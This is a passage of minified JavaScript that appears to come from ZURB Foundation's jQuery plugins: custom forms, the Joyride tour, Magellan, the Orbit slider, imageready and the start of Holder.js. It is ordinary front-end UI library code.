h=0,f=g.next();$options=g.find("option");f.find("ul").html("");$options.each(function(){$li=a("<li>"+a(this).html()+"</li>");f.find("ul").append($li)});$options.each(function(i){if(this.selected){f.find("li").eq(i).addClass("selected");f.find(".current").html(a(this).html())}});f.removeAttr("style").find("ul").removeAttr("style");f.find("li").each(function(){f.addClass("open");if(a(this).outerWidth()>h){h=a(this).outerWidth()}f.removeClass("open")});f.css("width",h+28+"px");f.find("ul").css("width",h+28+"px")};var d=function(f){var g=f.prev(),h=g[0];if(false===g.is(":disabled")){h.checked=((h.checked)?false:true);f.toggleClass("checked");g.trigger("change")}};var e=function(f){var h=f.prev(),g=h.closest("form.custom"),i=h[0];if(false===h.is(":disabled")){g.find('input:radio[name="'+h.attr("name")+'"]').next().not(f).removeClass("checked");if(!f.hasClass("checked")){f.toggleClass("checked")}i.checked=f.hasClass("checked");h.trigger("change")}};a(document).on("click","form.custom span.custom.checkbox",function(f){f.preventDefault();f.stopPropagation();d(a(this))});a(document).on("click","form.custom span.custom.radio",function(f){f.preventDefault();f.stopPropagation();e(a(this))});a(document).on("change","form.custom select[data-customforms!=disabled]",function(f){c(a(this))});a(document).on("click","form.custom label",function(i){var f=a("#"+a(this).attr("for")+"[data-customforms!=disabled]"),g,h;if(f.length!==0){if(f.attr("type")==="checkbox"){i.preventDefault();g=a(this).find("span.custom.checkbox");if(g.length==0){g=a(this).next("span.custom.checkbox")}if(g.length==0){g=a(this).prev("span.custom.checkbox")}d(g)}else{if(f.attr("type")==="radio"){i.preventDefault();h=a(this).find("span.custom.radio");if(h.length==0){h=a(this).next("span.custom.radio")}if(h.length==0){h=a(this).prev("span.custom.radio")}e(h)}}}});a(document).on("click","form.custom div.custom.dropdown a.current, form.custom div.custom.dropdown a.selector",function(i){var h=a(this),f=h.closest("div.custom.dropdown"),g=f.prev();i.preventDefault();a("div.dropdown").removeClass("open");if(false===g.is(":disabled")){f.toggleClass("open");if(f.hasClass("open")){a(document).bind("click.customdropdown",function(j){f.removeClass("open");a(document).unbind(".customdropdown")})}else{a(document).unbind(".customdropdown")}return false}});a(document).on("click","form.custom div.custom.dropdown li",function(i){var h=a(this),f=h.closest("div.custom.dropdown"),g=f.prev(),j=0;i.preventDefault();i.stopPropagation();a("div.dropdown").removeClass("open");h.closest("ul").find("li").removeClass("selected");h.addClass("selected");f.removeClass("open").find("a.current").html(h.html());h.closest("ul").find("li").each(function(k){if(h[0]==this){j=k}});g[0].selectedIndex=j;g.trigger("change")});a.fn.foundationCustomForms=a.foundation.customForms.appendCustomMarkup})(jQuery); (function(a,g,f){var b={version:"2.0.3",tipLocation:"bottom",nubPosition:"auto",scrollSpeed:300,timer:0,startTimerOnClick:true,startOffset:0,nextButton:true,tipAnimation:"fade",pauseAfter:[],tipAnimationFadeSpeed:300,cookieMonster:false,cookieName:"joyride",cookieDomain:false,tipContainer:"body",postRideCallback:a.noop,postStepCallback:a.noop,template:{link:'<a href="#close" class="joyride-close-tip">X</a>',timer:'<div class="joyride-timer-indicator-wrap"><span class="joyride-timer-indicator"></span></div>',tip:'<div class="joyride-tip-guide"><span class="joyride-nub"></span></div>',wrapper:'<div class="joyride-content-wrapper"></div>',button:'<a href="#" class="small button joyride-next-tip"></a>'}},d=d||false,e={},c={init:function(h){return this.each(function(){if(a.isEmptyObject(e)){e=a.extend(true,b,h);e.document=g.document;e.$document=a(e.document);e.$window=a(g);e.$content_el=a(this);e.body_offset=a(e.tipContainer).position();e.$tip_content=a("> li",e.$content_el);e.paused=false;e.attempts=0;e.tipLocationPatterns={top:["bottom"],bottom:[],left:["right","top","bottom"],right:["left","top","bottom"]};c.jquery_check();if(!a.isFunction(a.cookie)){e.cookieMonster=false}if(!e.cookieMonster||!a.cookie(e.cookieName)){e.$tip_content.each(function(i){c.create({$li:a(this),index:i})});if(!e.startTimerOnClick&&e.timer>0){c.show("init");c.startTimer()}else{c.show("init")}}e.$document.on("click.joyride",".joyride-next-tip, .joyride-modal-bg",function(i){i.preventDefault();if(e.$li.next().length<1){c.end()}else{if(e.timer>0){clearTimeout(e.automate);c.hide();c.show();c.startTimer()}else{c.hide();c.show()}}});e.$document.on("click.joyride",".joyride-close-tip",function(i){i.preventDefault();c.end()});e.$window.bind("resize.joyride",function(i){if(c.is_phone()){c.pos_phone()}else{c.pos_default()}})}else{c.restart()}})},resume:function(){c.set_li();c.show()},tip_template:function(j){var h,i;j.tip_class=j.tip_class||"";h=a(e.template.tip).addClass(j.tip_class);i=a.trim(a(j.li).html())+c.button_text(j.button_text)+e.template.link+c.timer_instance(j.index);h.append(a(e.template.wrapper));h.first().attr("data-index",j.index);a(".joyride-content-wrapper",h).append(i);return h[0]},timer_instance:function(h){var i;if((h===0&&e.startTimerOnClick&&e.timer>0)||e.timer===0){i=""}else{i=c.outerHTML(a(e.template.timer)[0])}return i},button_text:function(h){if(e.nextButton){h=a.trim(h)||"Next";h=c.outerHTML(a(e.template.button).append(h)[0])}else{h=""}return h},create:function(j){var i=j.$li.attr("data-button")||j.$li.attr("data-text"),k=j.$li.attr("class"),h=a(c.tip_template({tip_class:k,index:j.index,button_text:i,li:j.$li}));a(e.tipContainer).append(h)},show:function(j){var k={},i,l=[],m=0,n,h=null;if(e.$li===f||(a.inArray(e.$li.index(),e.pauseAfter)===-1)){if(e.paused){e.paused=false}else{c.set_li(j)}e.attempts=0;if(e.$li.length&&e.$target.length>0){l=(e.$li.data("options")||":").split(";");m=l.length;for(i=m-1;i>=0;i--){n=l[i].split(":");if(n.length===2){k[a.trim(n[0])]=a.trim(n[1])}}e.tipSettings=a.extend({},e,k);e.tipSettings.tipLocationPattern=e.tipLocationPatterns[e.tipSettings.tipLocation];if(!/body/i.test(e.$target.selector)){c.scroll_to()}if(c.is_phone()){c.pos_phone(true)}else{c.pos_default(true)}h=a(".joyride-timer-indicator",e.$next_tip);if(/pop/i.test(e.tipAnimation)){h.outerWidth(0);if(e.timer>0){e.$next_tip.show();h.animate({width:a(".joyride-timer-indicator-wrap",e.$next_tip).outerWidth()},e.timer)}else{e.$next_tip.show()}}else{if(/fade/i.test(e.tipAnimation)){h.outerWidth(0);if(e.timer>0){e.$next_tip.fadeIn(e.tipAnimationFadeSpeed);e.$next_tip.show();h.animate({width:a(".joyride-timer-indicator-wrap",e.$next_tip).outerWidth()},e.timer)}else{e.$next_tip.fadeIn(e.tipAnimationFadeSpeed)}}}e.$current_tip=e.$next_tip}else{if(e.$li&&e.$target.length<1){c.show()}else{c.end()}}}else{e.paused=true}},is_phone:function(){if(d){return d.mq("only screen and (max-width: 767px)")}return(e.$window.width()<767)?true:false},hide:function(){e.postStepCallback(e.$li.index(),e.$current_tip);a(".joyride-modal-bg").hide();e.$current_tip.hide()},set_li:function(h){if(h){e.$li=e.$tip_content.eq(e.startOffset);c.set_next_tip();e.$current_tip=e.$next_tip}else{e.$li=e.$li.next();c.set_next_tip()}c.set_target()},set_next_tip:function(){e.$next_tip=a(".joyride-tip-guide[data-index="+e.$li.index()+"]")},set_target:function(){var i=e.$li.attr("data-class"),j=e.$li.attr("data-id"),h=function(){if(j){return a(e.document.getElementById(j))}else{if(i){return a("."+i).first()}else{return a("body")}}};e.$target=h()},scroll_to:function(){var i,h;i=e.$window.height()/2;h=Math.ceil(e.$target.offset().top-i+e.$next_tip.outerHeight());a("html, body").stop().animate({scrollTop:h},e.scrollSpeed)},paused:function(){if((a.inArray((e.$li.index()+1),e.pauseAfter)===-1)){return true}return false},destroy:function(){e.$document.off(".joyride");a(g).off(".joyride");a(".joyride-close-tip, .joyride-next-tip, .joyride-modal-bg").off(".joyride");a(".joyride-tip-guide, .joyride-modal-bg").remove();clearTimeout(e.automate);e={}},restart:function(){c.hide();e.$li=f;c.show("init")},pos_default:function(j){var i=Math.ceil(e.$window.height()/2),l=e.$next_tip.offset(),h=a(".joyride-nub",e.$next_tip),k=Math.ceil(h.outerHeight()/2),m=j||false;if(m){e.$next_tip.css("visibility","hidden");e.$next_tip.show()}if(!/body/i.test(e.$target.selector)){if(c.bottom()){e.$next_tip.css({top:(e.$target.offset().top+k+e.$target.outerHeight()),left:e.$target.offset().left});c.nub_position(h,e.tipSettings.nubPosition,"top")}else{if(c.top()){e.$next_tip.css({top:(e.$target.offset().top-e.$next_tip.outerHeight()-k),left:e.$target.offset().left});c.nub_position(h,e.tipSettings.nubPosition,"bottom")}else{if(c.right()){e.$next_tip.css({top:e.$target.offset().top,left:(e.$target.outerWidth()+e.$target.offset().left)});c.nub_position(h,e.tipSettings.nubPosition,"left")}else{if(c.left()){e.$next_tip.css({top:e.$target.offset().top,left:(e.$target.offset().left-e.$next_tip.outerWidth()-k)});c.nub_position(h,e.tipSettings.nubPosition,"right")}}}}if(!c.visible(c.corners(e.$next_tip))&&e.attempts<e.tipSettings.tipLocationPattern.length){h.removeClass("bottom").removeClass("top").removeClass("right").removeClass("left");e.tipSettings.tipLocation=e.tipSettings.tipLocationPattern[e.attempts];e.attempts++;c.pos_default(true)}}else{if(e.$li.length){c.pos_modal(h)}}if(m){e.$next_tip.hide();e.$next_tip.css("visibility","visible")}},pos_phone:function(i){var l=e.$next_tip.outerHeight(),m=e.$next_tip.offset(),k=e.$target.outerHeight(),h=a(".joyride-nub",e.$next_tip),j=Math.ceil(h.outerHeight()/2),n=i||false;h.removeClass("bottom").removeClass("top").removeClass("right").removeClass("left");if(n){e.$next_tip.css("visibility","hidden");e.$next_tip.show()}if(!/body/i.test(e.$target.selector)){if(c.top()){e.$next_tip.offset({top:e.$target.offset().top-l-j});h.addClass("bottom")}else{e.$next_tip.offset({top:e.$target.offset().top+k+j});h.addClass("top")}}else{if(e.$li.length){c.pos_modal(h)}}if(n){e.$next_tip.hide();e.$next_tip.css("visibility","visible")}},pos_modal:function(h){c.center();h.hide();if(a(".joyride-modal-bg").length<1){a("body").append('<div class="joyride-modal-bg">').show()}if(/pop/i.test(e.tipAnimation)){a(".joyride-modal-bg").show()}else{a(".joyride-modal-bg").fadeIn(e.tipAnimationFadeSpeed)}},center:function(){var h=e.$window;e.$next_tip.css({top:(((h.height()-e.$next_tip.outerHeight())/2)+h.scrollTop()),left:(((h.width()-e.$next_tip.outerWidth())/2)+h.scrollLeft())});return true},bottom:function(){return/bottom/i.test(e.tipSettings.tipLocation)},top:function(){return/top/i.test(e.tipSettings.tipLocation)},right:function(){return/right/i.test(e.tipSettings.tipLocation)},left:function(){return/left/i.test(e.tipSettings.tipLocation)},corners:function(i){var k=e.$window,j=k.width()+k.scrollLeft(),h=k.width()+k.scrollTop();return[i.offset().top<=k.scrollTop(),j<=i.offset().left+i.outerWidth(),h<=i.offset().top+i.outerHeight(),k.scrollLeft()>=i.offset().left]},visible:function(h){var j=h.length;while(j--){if(h[j]){return false}}return true},nub_position:function(i,j,h){if(j==="auto"){i.addClass(h)}else{i.addClass(j)}},startTimer:function(){if(e.$li.length){e.automate=setTimeout(function(){c.hide();c.show();c.startTimer()},e.timer)}else{clearTimeout(e.automate)}},end:function(){if(e.cookieMonster){a.cookie(e.cookieName,"ridden",{expires:365,domain:e.cookieDomain})}if(e.timer>0){clearTimeout(e.automate)}a(".joyride-modal-bg").hide();e.$current_tip.hide();e.postStepCallback(e.$li.index(),e.$current_tip);e.postRideCallback(e.$li.index(),e.$current_tip)},jquery_check:function(){if(!a.isFunction(a.fn.on)){a.fn.on=function(j,i,h){return this.delegate(i,j,h)};a.fn.off=function(j,i,h){return this.undelegate(i,j,h)};return false}return true},outerHTML:function(h){return h.outerHTML||new XMLSerializer().serializeToString(h)},version:function(){return e.version}};a.fn.joyride=function(h){if(c[h]){return c[h].apply(this,Array.prototype.slice.call(arguments,1))}else{if(typeof h==="object"||!h){return c.init.apply(this,arguments)}else{a.error("Method "+h+" does not exist on jQuery.joyride")}}}}(jQuery,this)); (function(a,c,b){a.fn.foundationMagellan=function(j){var h=a(c),d=a(document),f=a("[data-magellan-expedition=fixed]"),i={threshold:(f.length)?f.outerHeight(true):0,activeClass:"active"},j=a.extend({},i,j);d.on("magellan.arrival","[data-magellan-arrival]",function(n){var k=a(this),l=k.closest("[data-magellan-expedition]"),m=l.attr("data-magellan-active-class")||j.activeClass;k.closest("[data-magellan-expedition]").find("[data-magellan-arrival]").not(this).removeClass(m);k.addClass(m)});var e=a("[data-magellan-expedition]");e.find("[data-magellan-arrival]:first").addClass(e.attr("data-magellan-active-class")||j.activeClass);f.on("magellan.update-position",function(){var k=a(this);k.data("magellan-fixed-position","");k.data("magellan-top-offset","")}).trigger("magellan.update-position");h.on("resize.magellan",function(){f.trigger("magellan.update-position")});h.on("scroll.magellan",function(){var k=h.scrollTop();f.each(function(){var l=a(this);if(l.data("magellan-top-offset")===""){l.data("magellan-top-offset",l.offset().top)}var m=(k+j.threshold)>l.data("magellan-top-offset");if(l.data("magellan-fixed-position")!=m){l.data("magellan-fixed-position",m);if(m){l.css({position:"fixed",top:0})}else{l.css({position:"",top:""})}}})});var g=a("[data-magellan-destination]:last");if(g.length>0){h.on("scroll.magellan",function(k){var n=h.scrollTop(),m=n+h.outerHeight(true),l=Math.ceil(g.offset().top);a("[data-magellan-destination]").each(function(){var o=a(this),p=o.attr("data-magellan-destination"),q=o.offset().top-n;if(q<=j.threshold){a("[data-magellan-arrival="+p+"]").trigger("magellan.arrival")}if(m>=d.outerHeight(true)&&l>n&&l<m){a("[data-magellan-arrival]:last").trigger("magellan.arrival")}})})}}}(jQuery,this)); (function(a,c,b){a.fn.foundationMediaQueryViewer=function(e){var f=a.extend(e,{toggleKey:77}),d=a(document);d.on("keyup.mediaQueryViewer",":input",function(g){if(g.which===f.toggleKey){g.stopPropagation()}});d.on("keyup.mediaQueryViewer",function(h){var g=a("#fqv");if(h.which===f.toggleKey){if(g.length>0){g.remove()}else{a("body").prepend('<div id="fqv" style="position:fixed;top:4px;left:4px;z-index:999;color:#fff;"><p style="font-size:12px;background:rgba(0,0,0,0.75);padding:5px;margin-bottom:1px;line-height:1.2;"><span class="left">Media:</span> <span style="font-weight:bold;" class="show-for-xlarge">Extra Large</span><span style="font-weight:bold;" class="show-for-large">Large</span><span style="font-weight:bold;" class="show-for-medium">Medium</span><span style="font-weight:bold;" class="show-for-small">Small</span><span style="font-weight:bold;" class="show-for-landscape">Landscape</span><span style="font-weight:bold;" class="show-for-portrait">Portrait</span><span style="font-weight:bold;" class="show-for-touch">Touch</span></p></div>')}}})}})(jQuery,this); (function(a,c,b){a.fn.foundationNavigation=function(e){var d=false;if(Modernizr.touch||navigator.userAgent.match(/Windows Phone/i)){a(document).on("click.fndtn touchstart.fndtn",".nav-bar a.flyout-toggle",function(f){f.preventDefault();var g=a(this).siblings(".flyout").first();if(d===false){a(".nav-bar .flyout").not(g).slideUp(500);g.slideToggle(500,function(){d=false})}d=true});a(".nav-bar>li.has-flyout",this).addClass("is-touch")}else{a(".nav-bar>li.has-flyout",this).on("mouseenter mouseleave",function(f){if(f.type=="mouseenter"){a(".nav-bar").find(".flyout").hide();a(this).children(".flyout").show()}if(f.type=="mouseleave"){var g=a(this).children(".flyout"),i=g.find("input"),h=function(k){var j;if(k.length>0){k.each(function(){if(a(this).is(":focus")){j=true}});return j}return false};if(!h(i)){a(this).children(".flyout").hide()}}})}}})(jQuery,this); (function(a){a.fn.findFirstImage=function(){return this.first().find("img").andSelf().filter("img").first()};var b={defaults:{animation:"horizontal-push",animationSpeed:600,timer:true,advanceSpeed:4000,pauseOnHover:false,startClockOnMouseOut:false,startClockOnMouseOutAfter:1000,directionalNav:true,directionalNavRightText:"Right",directionalNavLeftText:"Left",captions:true,captionAnimation:"fade",captionAnimationSpeed:600,resetTimerOnClick:false,bullets:false,bulletThumbs:false,bulletThumbLocation:"",bulletThumbsHideOnSmall:true,afterSlideChange:a.noop,afterLoadComplete:a.noop,fluid:true,centerBullets:true,singleCycle:false,slideNumber:false,stackOnSmall:false},activeSlide:0,numberSlides:0,orbitWidth:null,orbitHeight:null,locked:null,timerRunning:null,degrees:0,wrapperHTML:'<div class="orbit-wrapper" />',timerHTML:'<div class="timer"><span class="mask"><span class="rotator"></span></span><span class="pause"></span></div>',captionHTML:'<div class="orbit-caption"></div>',directionalNavHTML:'<div class="slider-nav hide-for-small"><span class="right"></span><span class="left"></span></div>',bulletHTML:'<ul class="orbit-bullets"></ul>',slideNumberHTML:'<span class="orbit-slide-counter"></span>',init:function(d,f){var c,e=0,g=this;this.clickTimer=a.proxy(this.clickTimer,this);this.addBullet=a.proxy(this.addBullet,this);this.resetAndUnlock=a.proxy(this.resetAndUnlock,this);this.stopClock=a.proxy(this.stopClock,this);this.startTimerAfterMouseLeave=a.proxy(this.startTimerAfterMouseLeave,this);this.clearClockMouseLeaveTimer=a.proxy(this.clearClockMouseLeaveTimer,this);this.rotateTimer=a.proxy(this.rotateTimer,this);this.options=a.extend({},this.defaults,f);if(this.options.timer==="false"){this.options.timer=false}if(this.options.captions==="false"){this.options.captions=false}if(this.options.directionalNav==="false"){this.options.directionalNav=false}this.$element=a(d);this.$wrapper=this.$element.wrap(this.wrapperHTML).parent();this.$slides=this.$element.children("img, a, div, figure, li");this.$element.on("movestart",function(h){if((h.distX>h.distY&&h.distX<-h.distY)||(h.distX<h.distY&&h.distX>-h.distY)){h.preventDefault()}});this.$element.bind("orbit.next",function(){g.shift("next")});this.$element.bind("orbit.prev",function(){g.shift("prev")});this.$element.bind("swipeleft",function(){a(this).trigger("orbit.next")});this.$element.bind("swiperight",function(){a(this).trigger("orbit.prev")});this.$element.bind("orbit.goto",function(h,i){g.shift(i)});this.$element.bind("orbit.start",function(h,i){g.startClock()});this.$element.bind("orbit.stop",function(h,i){g.stopClock()});c=this.$slides.filter("img");if(c.length===0){this.loaded()}else{c.bind("imageready",function(){e+=1;if(e===c.length){g.loaded()}})}},loaded:function(){this.$element.addClass("orbit").css({width:"1px",height:"1px"});if(this.options.stackOnSmall){this.$element.addClass("orbit-stack-on-small")}this.$slides.addClass("orbit-slide").css({opacity:0});this.setDimentionsFromLargestSlide();this.updateOptionsIfOnlyOneSlide();this.setupFirstSlide();this.notifySlideChange();if(this.options.timer){this.setupTimer();this.startClock()}if(this.options.captions){this.setupCaptions()}if(this.options.directionalNav){this.setupDirectionalNav()}if(this.options.bullets){this.setupBulletNav();this.setActiveBullet()}this.options.afterLoadComplete.call(this);Holder.run()},currentSlide:function(){return this.$slides.eq(this.activeSlide)},notifySlideChange:function(){if(this.options.slideNumber){var d=(this.activeSlide+1)+" of "+this.$slides.length;this.$element.trigger("orbit.change",{slideIndex:this.activeSlide,slideCount:this.$slides.length});if(this.$counter===undefined){var c=a(this.slideNumberHTML).html(d);this.$counter=c;this.$wrapper.append(this.$counter)}else{this.$counter.html(d)}}},setDimentionsFromLargestSlide:function(){var d=this,c;d.$element.add(d.$wrapper).width(this.$slides.first().outerWidth());d.$element.add(d.$wrapper).height(this.$slides.first().height());d.orbitWidth=this.$slides.first().outerWidth();d.orbitHeight=this.$slides.first().height();c=this.$slides.first().findFirstImage().clone();this.$slides.each(function(){var e=a(this),g=e.outerWidth(),f=e.height();if(g>d.$element.outerWidth()){d.$element.add(d.$wrapper).width(g);d.orbitWidth=d.$element.outerWidth()}if(f>d.$element.height()){d.$element.add(d.$wrapper).height(f);d.orbitHeight=d.$element.height();c=a(this).findFirstImage().clone()}d.numberSlides+=1});if(this.options.fluid){if(typeof this.options.fluid==="string"){c=a("<img>").attr("data-src","holder.js/"+this.options.fluid)}d.$element.prepend(c);c.addClass("fluid-placeholder");d.$element.add(d.$wrapper).css({width:"inherit"});d.$element.add(d.$wrapper).css({height:"inherit"});a(window).bind("resize",function(){d.orbitWidth=d.$element.outerWidth();d.orbitHeight=d.$element.height()})}},lock:function(){this.locked=true},unlock:function(){this.locked=false},updateOptionsIfOnlyOneSlide:function(){if(this.$slides.length===1){this.options.directionalNav=false;this.options.timer=false;this.options.bullets=false}},setupFirstSlide:function(){var c=this;this.$slides.first().css({"z-index":3,opacity:1}).fadeIn(function(){c.$slides.css({display:"block"})})},startClock:function(){var c=this;if(!this.options.timer){return false}if(this.$timer.is(":hidden")){this.clock=setInterval(function(){c.$element.trigger("orbit.next")},this.options.advanceSpeed)}else{this.timerRunning=true;this.$pause.removeClass("active");this.clock=setInterval(this.rotateTimer,this.options.advanceSpeed/180,false)}},rotateTimer:function(d){var c="rotate("+this.degrees+"deg)";this.degrees+=2;this.$rotator.css({"-webkit-transform":c,"-moz-transform":c,"-o-transform":c,"-ms-transform":c});if(d){this.degrees=0;this.$rotator.removeClass("move");this.$mask.removeClass("move")}if(this.degrees>180){this.$rotator.addClass("move");this.$mask.addClass("move")}if(this.degrees>360){this.$rotator.removeClass("move");this.$mask.removeClass("move");this.degrees=0;this.$element.trigger("orbit.next")}},stopClock:function(){if(!this.options.timer){return false}else{this.timerRunning=false;clearInterval(this.clock);this.$pause.addClass("active")}},setupTimer:function(){this.$timer=a(this.timerHTML);this.$wrapper.append(this.$timer);this.$rotator=this.$timer.find(".rotator");this.$mask=this.$timer.find(".mask");this.$pause=this.$timer.find(".pause");this.$timer.click(this.clickTimer);if(this.options.startClockOnMouseOut){this.$wrapper.mouseleave(this.startTimerAfterMouseLeave);this.$wrapper.mouseenter(this.clearClockMouseLeaveTimer)}if(this.options.pauseOnHover){this.$wrapper.mouseenter(this.stopClock)}},startTimerAfterMouseLeave:function(){var c=this;this.outTimer=setTimeout(function(){if(!c.timerRunning){c.startClock()}},this.options.startClockOnMouseOutAfter)},clearClockMouseLeaveTimer:function(){clearTimeout(this.outTimer)},clickTimer:function(){if(!this.timerRunning){this.startClock()}else{this.stopClock()}},setupCaptions:function(){this.$caption=a(this.captionHTML);this.$wrapper.append(this.$caption);this.setCaption()},setCaption:function(){var d=this.currentSlide().attr("data-caption"),c;if(!this.options.captions){return false}if(d){if(a.trim(a(d).text()).length<1){return false}if(d.charAt(0)=="#"){d=d.substring(1,d.length)}c=a("#"+d).html();this.$caption.attr("id",d).html(c);switch(this.options.captionAnimation){case"none":this.$caption.show();break;case"fade":this.$caption.fadeIn(this.options.captionAnimationSpeed);break;case"slideOpen":this.$caption.slideDown(this.options.captionAnimationSpeed);break}}else{switch(this.options.captionAnimation){case"none":this.$caption.hide();break;case"fade":this.$caption.fadeOut(this.options.captionAnimationSpeed);break;case"slideOpen":this.$caption.slideUp(this.options.captionAnimationSpeed);break}}},setupDirectionalNav:function(){var d=this,c=a(this.directionalNavHTML);c.find(".right").html(this.options.directionalNavRightText);c.find(".left").html(this.options.directionalNavLeftText);this.$wrapper.append(c);this.$wrapper.find(".left").click(function(){d.stopClock();if(d.options.resetTimerOnClick){d.rotateTimer(true);d.startClock()}d.$element.trigger("orbit.prev")});this.$wrapper.find(".right").click(function(){d.stopClock();if(d.options.resetTimerOnClick){d.rotateTimer(true);d.startClock()}d.$element.trigger("orbit.next")})},setupBulletNav:function(){this.$bullets=a(this.bulletHTML);this.$wrapper.append(this.$bullets);this.$slides.each(this.addBullet);this.$element.addClass("with-bullets");if(this.options.centerBullets){this.$bullets.css("margin-left",-this.$bullets.outerWidth()/2)}if(this.options.bulletThumbsHideOnSmall){this.$bullets.addClass("hide-for-small")}},addBullet:function(d,g){var e=d+1,c=a("<li>"+(e)+"</li>"),h,f=this;if(this.options.bulletThumbs){h=a(g).attr("data-thumb");if(h){c.addClass("has-thumb").css({background:"url("+this.options.bulletThumbLocation+h+") no-repeat"})}}this.$bullets.append(c);c.data("index",d);c.click(function(){f.stopClock();if(f.options.resetTimerOnClick){f.rotateTimer(true);f.startClock()}f.$element.trigger("orbit.goto",[c.data("index")])})},setActiveBullet:function(){if(!this.options.bullets){return false}else{this.$bullets.find("li").removeClass("active").eq(this.activeSlide).addClass("active")}},resetAndUnlock:function(){this.$slides.eq(this.prevActiveSlide).css({"z-index":1});this.unlock();this.options.afterSlideChange.call(this,this.$slides.eq(this.prevActiveSlide),this.$slides.eq(this.activeSlide))},shift:function(c){var d=c;this.prevActiveSlide=this.activeSlide;if(this.prevActiveSlide==d){return false}if(this.$slides.length=="1"){return false}if(!this.locked){this.lock();if(c=="next"){this.activeSlide++;if(this.activeSlide==this.numberSlides){this.activeSlide=0}}else{if(c=="prev"){this.activeSlide--;if(this.activeSlide<0){this.activeSlide=this.numberSlides-1}}else{this.activeSlide=c;if(this.prevActiveSlide<this.activeSlide){d="next"}else{if(this.prevActiveSlide>this.activeSlide){d="prev"}}}}this.setActiveBullet();this.notifySlideChange();this.$slides.eq(this.prevActiveSlide).css({"z-index":2});if(this.options.animation=="fade"){this.$slides.eq(this.activeSlide).css({opacity:0,"z-index":3}).animate({opacity:1},this.options.animationSpeed,this.resetAndUnlock);this.$slides.eq(this.prevActiveSlide).animate({opacity:0},this.options.animationSpeed)}if(this.options.animation=="horizontal-slide"){if(d=="next"){this.$slides.eq(this.activeSlide).css({left:this.orbitWidth,"z-index":3}).css("opacity",1).animate({left:0},this.options.animationSpeed,this.resetAndUnlock)}if(d=="prev"){this.$slides.eq(this.activeSlide).css({left:-this.orbitWidth,"z-index":3}).css("opacity",1).animate({left:0},this.options.animationSpeed,this.resetAndUnlock)}this.$slides.eq(this.prevActiveSlide).css("opacity",0)}if(this.options.animation=="vertical-slide"){if(d=="prev"){this.$slides.eq(this.activeSlide).css({top:this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0},this.options.animationSpeed,this.resetAndUnlock);this.$slides.eq(this.prevActiveSlide).css("opacity",0)}if(d=="next"){this.$slides.eq(this.activeSlide).css({top:-this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0},this.options.animationSpeed,this.resetAndUnlock)}this.$slides.eq(this.prevActiveSlide).css("opacity",0)}if(this.options.animation=="horizontal-push"){if(d=="next"){this.$slides.eq(this.activeSlide).css({left:this.orbitWidth,"z-index":3}).animate({left:0,opacity:1},this.options.animationSpeed,this.resetAndUnlock);this.$slides.eq(this.prevActiveSlide).animate({left:-this.orbitWidth},this.options.animationSpeed,"",function(){a(this).css({opacity:0})})}if(d=="prev"){this.$slides.eq(this.activeSlide).css({left:-this.orbitWidth,"z-index":3}).animate({left:0,opacity:1},this.options.animationSpeed,this.resetAndUnlock);this.$slides.eq(this.prevActiveSlide).animate({left:this.orbitWidth},this.options.animationSpeed,"",function(){a(this).css({opacity:0})})}}if(this.options.animation=="vertical-push"){if(d=="next"){this.$slides.eq(this.activeSlide).css({top:-this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0,opacity:1},this.options.animationSpeed,this.resetAndUnlock);this.$slides.eq(this.prevActiveSlide).css("opacity",0).animate({top:this.orbitHeight},this.options.animationSpeed,"")}if(d=="prev"){this.$slides.eq(this.activeSlide).css({top:this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0},this.options.animationSpeed,this.resetAndUnlock);this.$slides.eq(this.prevActiveSlide).css("opacity",0).animate({top:-this.orbitHeight},this.options.animationSpeed)}}this.setCaption()}if(this.activeSlide===this.$slides.length-1&&this.options.singleCycle){this.stopClock()}}};a.fn.orbit=function(c){return this.each(function(){var d=a.extend({},b);d.init(this,c)})}})(jQuery); /* * jQuery imageready Plugin * http://www.zurb.com/playground/ * * Copyright 2011, ZURB * Released under the MIT License */ (function(a){var c={};a.event.special.imageready={setup:function(d,f,e){c=d||c},add:function(e){var d=a(this),f;if(this.nodeType===1&&this.tagName.toLowerCase()==="img"&&this.src!==""){if(c.forceLoad){f=d.attr("src");d.attr("src","");b(this,e.handler);d.attr("src",f)}else{if(this.complete||this.readyState===4){e.handler.apply(this,arguments)}else{b(this,e.handler)}}}},teardown:function(d){a(this).unbind(".imageready")}};function b(f,e){var d=a(f);d.bind("load.imageready",function(){e.apply(f,arguments);d.unbind("load.imageready")})}}(jQuery));var Holder=Holder||{};(function(a,m){var i=false,g=false,b=document.createElement("canvas");function c(C,G){var B="complete",F="readystatechange",H=!1,z=H,q=!0,A=C.document,p=A.documentElement,w=A.addEventListener?"addEventListener":"attachEvent",I=A.addEventListener?"removeEventListener":"detachEvent",x=A.addEventListener?"":"on",E=function(n){(n.type!=F||A.readyState==B)&&((n.type=="load"?C:A)[I](x+n.type,E,H),!z&&(z=!0)&&G.call(C,null))},D=function(){try{p.doScroll("left")}catch(o){setTimeout(D,50);return}E("poll")};if(A.readyState==B){G.call(C,"lazy")}else{if(A.createEventObject&&p.doScroll){try{q=!C.frameElement}catch(J){}q&&D()}A[w](x+"DOMContentLoaded",E,H),A[w](x+F,E,H),C[w](x+"load",E,H)}}function k(n){n=n.match(/^(\W)?(.*)/);var o=document["getElement"+(n[1]?n[1]=="#"?"ById":"sByClassName":"sByTagName")](n[2]);var p=[];o!=null&&(o.length?p=o:o.length==0?p=o:p=[o]);return p}function f(n,o){var p={};for(var q in n){p[q]=n[q]}for(var r in o){p[r]=o[r]}return p}function e(n,p,s){var o=[p.height,p.width].sort();var q=Math.round(o[1]/16),r=Math.round(o[0]/16);var u=Math.max(s.size,q);b.width=p.width;b.height=p.height;n.textAlign="center";n.textBaseline="middle";n.fillStyle=s.background;n.fillRect(0,0,p.width,p.height);n.fillStyle=s.foreground;n.font="bold "+u+"px sans-serif";var t=s.text?s.text:(p.width+"x"+p.height);if(Math.round(n.measureText(t).width)/p.width>1){u=Math.max(r,s.size)}n.font="bold "+u+"px sans-serif";n.fillText(t,(p.width/2),(p.height/2),p.width);return b.toDataURL("image/png")}if(!b.getContext){g=true}else{if(b.toDataURL("image/png").indexOf("data:image/png")<0){g=true}else{var d=b.getContext("2d")}}var l={domain:"holder.js",images:"img",themes:{gray:{background:"#eee",foreground:"#aaa",size:12},social:{background:"#3a5a97",foreground:"#fff",size:12},industrial:{background:"#434A52",foreground:"#C2F200",size:12}}};a.flags={dimensions:{regex:/([0-9]+)x([0-9]+)/,output:function(o){var 